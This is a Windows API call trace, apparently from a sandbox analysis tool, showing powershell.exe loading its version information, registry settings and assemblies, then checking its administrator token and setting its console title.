	[0280.603] CoTaskMemFree (pv=0x2fc900) 
	[0280.603] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x2bf8c40, puLen=0x1cd970) returned 1
	[0280.603] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0280.603] CoTaskMemAlloc (cb=0x58) returned 0x25a930
	[0280.603] lstrcpyW (in: lpString1=0x25a930, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0280.603] CoTaskMemFree (pv=0x25a930) 
	[0280.603] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x2bf8cbc, puLen=0x1cd970) returned 1
	[0280.603] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0280.603] CoTaskMemAlloc (cb=0x20) returned 0x2fa950
	[0280.603] lstrcpyW (in: lpString1=0x2fa950, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0280.603] CoTaskMemFree (pv=0x2fa950) 
	[0280.603] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x2bf8964, puLen=0x1cd970) returned 1
	[0280.603] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0280.603] CoTaskMemAlloc (cb=0x66) returned 0x2f0840
	[0280.603] lstrcpyW (in: lpString1=0x2f0840, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0280.603] CoTaskMemFree (pv=0x2f0840) 
	[0280.603] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x0, puLen=0x1cd970) returned 0
	[0280.603] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x0, puLen=0x1cd970) returned 0
	[0280.603] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x0, puLen=0x1cd970) returned 0
	[0280.604] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cd948, puLen=0x1cd940 | out: lplpBuffer=0x1cd948*=0x2bf890c, puLen=0x1cd940) returned 1
	[0280.604] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0280.604] VerLanguageNameW (in: wLang=0x0, szLang=0x2a92a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0280.604] CoTaskMemFree (pv=0x2a92a0) 
	[0280.604] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\", lplpBuffer=0x1cd998, puLen=0x1cd990 | out: lplpBuffer=0x1cd998*=0x2bf8898, puLen=0x1cd990) returned 1
	[0280.611] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0280.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0280.611] CoTaskMemFree (pv=0x2a1100) 
	[0280.613] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0280.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0280.613] CoTaskMemFree (pv=0x2a1100) 
	[0280.613] lstrlenW (lpString="䅁") returned 1
	[0280.622] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd868 | out: phkResult=0x1cd868*=0x308) returned 0x0
	[0280.623] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd858 | out: phkResult=0x1cd858*=0x30c) returned 0x0
	[0280.623] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd8e8 | out: phkResult=0x1cd8e8*=0x310) returned 0x0
	[0280.626] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd82c, lpData=0x0, lpcbData=0x1cd828*=0x0 | out: lpType=0x1cd82c*=0x1, lpData=0x0, lpcbData=0x1cd828*=0x56) returned 0x0
	[0280.628] CoTaskMemAlloc (cb=0x5a) returned 0x2f07d0
	[0280.628] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd7fc, lpData=0x2f07d0, lpcbData=0x1cd7f8*=0x56 | out: lpType=0x1cd7fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd7f8*=0x56) returned 0x0
	[0280.628] CoTaskMemFree (pv=0x2f07d0) 
	[0280.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0280.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0281.200] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0281.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0281.201] CoTaskMemFree (pv=0x2a1100) 
	[0284.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0284.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0286.000] CoTaskMemAlloc (cb=0x104) returned 0x2a1210
	[0286.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0286.000] CoTaskMemFree (pv=0x2a1210) 
	[0286.001] CoTaskMemAlloc (cb=0x104) returned 0x2a1210
	[0286.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0286.001] CoTaskMemFree (pv=0x2a1210) 
	[0286.762] CoTaskMemAlloc (cb=0x104) returned 0x2a1210
	[0286.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0286.762] CoTaskMemFree (pv=0x2a1210) 
	[0286.762] CoTaskMemAlloc (cb=0x104) returned 0x2a1210
	[0286.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0286.763] CoTaskMemFree (pv=0x2a1210) 
	[0286.763] CoTaskMemAlloc (cb=0x104) returned 0x2a1210
	[0286.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0286.763] CoTaskMemFree (pv=0x2a1210) 
	[0288.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0288.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0288.246] CoTaskMemAlloc (cb=0x104) returned 0x2a1210
	[0288.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.246] CoTaskMemFree (pv=0x2a1210) 
	[0288.250] CoTaskMemAlloc (cb=0x104) returned 0x2a1210
	[0288.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0288.250] CoTaskMemFree (pv=0x2a1210) 
	[0288.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0293.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0293.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0293.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0293.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0296.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0296.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0297.963] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0297.963] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.963] CoTaskMemFree (pv=0x2a1430) 
	[0297.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0297.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0297.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0297.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0298.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1cd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0298.665] SetErrorMode (uMode=0x1) returned 0x1
	[0298.665] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1cd7c0 | out: lpFileInformation=0x1cd7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0298.665] SetErrorMode (uMode=0x1) returned 0x1
	[0300.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0300.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0300.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0300.967] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0300.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.967] CoTaskMemFree (pv=0x2a1430) 
	[0300.968] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0300.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.968] CoTaskMemFree (pv=0x2a1430) 
	[0300.968] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0300.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.968] CoTaskMemFree (pv=0x2a1430) 
	[0300.970] CoCreateGuid (in: pguid=0x1cdb88 | out: pguid=0x1cdb88*(Data1=0x4830e380, Data2=0x99a7, Data3=0x407b, Data4=([0]=0x86, [1]=0xc3, [2]=0x48, [3]=0xc4, [4]=0x18, [5]=0x8, [6]=0xbb, [7]=0x96))) returned 0x0
	[0300.972] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0300.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.972] CoTaskMemFree (pv=0x2a1430) 
	[0300.973] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0300.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.973] CoTaskMemFree (pv=0x2a1430) 
	[0300.974] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0300.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0300.974] CoTaskMemFree (pv=0x2a1430) 
	[0300.979] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0300.984] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0300.985] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1cd830 | out: lpConsoleScreenBufferInfo=0x1cd830) returned 1
	[0300.987] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1cd858 | out: TokenHandle=0x1cd858*=0x1d4) returned 1
	[0300.989] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cd778 | out: TokenInformation=0x0, ReturnLength=0x1cd778) returned 0
	[0300.990] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x267290, TokenInformationLength=0x4, ReturnLength=0x1cd778 | out: TokenInformation=0x267290, ReturnLength=0x1cd778) returned 1
	[0300.991] DuplicateTokenEx (in: hExistingToken=0x1d4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1cd8d8 | out: phNewToken=0x1cd8d8*=0x1cc) returned 1
	[0300.991] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cd778 | out: TokenInformation=0x0, ReturnLength=0x1cd778) returned 0
	[0300.991] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2672c0
	[0300.991] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x2672c0, TokenInformationLength=0x4, ReturnLength=0x1cd778 | out: TokenInformation=0x2672c0, ReturnLength=0x1cd778) returned 1
	[0300.992] CheckTokenMembership (in: TokenHandle=0x1cc, SidToCheck=0x2cd3618*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1cd8e8 | out: IsMember=0x1cd8e8) returned 1
	[0300.992] CloseHandle (hObject=0x1cc) returned 1
	[0300.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0300.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0300.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0300.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.213] CoTaskMemAlloc (cb=0x804) returned 0x1b7268e0
	[0301.213] GetConsoleTitleW (in: lpConsoleTitle=0x1b7268e0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0301.255] CoTaskMemFree (pv=0x1b7268e0) 
	[0301.267] CoTaskMemAlloc (cb=0x804) returned 0x1b727190
	[0301.267] GetConsoleTitleW (in: lpConsoleTitle=0x1b727190, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0301.267] CoTaskMemFree (pv=0x1b727190) 
	[0301.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.270] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
